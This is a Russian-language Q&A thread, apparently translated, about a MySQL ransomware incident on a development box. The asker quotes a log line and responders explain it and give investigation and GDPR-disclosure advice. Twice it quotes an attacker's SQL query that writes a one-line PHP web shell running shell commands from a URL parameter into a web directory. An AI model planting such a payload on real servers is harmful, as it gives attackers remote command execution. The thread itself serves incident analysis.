У меня была тестовая база данных mysql, запущенная на Vagrant dev box. Оказывается, сеть была не такой уж безопасной.
Все базы данных были удалены (и заменены примечанием о программе-вымогателе БД), и в журналах я вижу все команды drop db. Однако я нигде не вижу никаких признаков команд dump или mysql dump.
В журналах есть несколько команд, как показано ниже.
Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
Query SHOW SESSION VARIABLES LIKE 'FOREIGN_KEY_CHECKS'
Query SELECT "CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>" INTO OUTFILE '/home/http/817BCD5B9C3A4B79D312345AB.php'
Однако ни одного из аутфилов нигде не было. Могли ли данные быть загружены через аутфайлы или это было средством для запуска внешних команд?
Меня не волнует, что данные были удалены, потому что это была всего лишь разработка и есть много резервных копий. Вопрос в том, могли ли быть загружены данные, если бы не было команд дампа? Если да, то что мне нужно искать? Мне просто нужно попытаться подтвердить, взяли ли хакеры какие-то данные, которые могут быть утечкой и т. Д.
SELECT "CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>" INTO OUTFILE '/home/http/817BCD5B9C3A4B79D312345AB.php' явно попытка создать оболочка бэкдорадля выполнения любых команд в системе, а не только SQL-запросов, которые вы уже нашли. Если /home/http/ общедоступен через HTTP (S), они могли выполнить больше действий после первого эксплойта.
Вы можете найти дальнейшие следы того, что было сделано в журналах вашего веб-сервера, найдя команды, выполняемые через /817BCD5B9C3A4B79D312345AB.php?cmd=. Там могут быть команды для дампа SQL и удаления файлов - или команды, используемые для создания другого доступа к оболочке, который не оставит таких следов.
Вы понимаете, что для работы программы-вымогателя у них должна быть копия ваших данных, если они удалили вашу локальную копию? В противном случае выкуп не составит большого труда - если бы они просто удалили его, за что бы вы заплатили? Часто они отправляют сегмент данных, чтобы доказать, что у них есть копия.
Какие бы данные ни были в этой базе данных, считайте их полностью нарушенными. Имейте в виду, что если у вас есть какие-либо данные о гражданах Европы, нарушение должно быть публично раскрыто в течение 72 часов с момента обнаружения.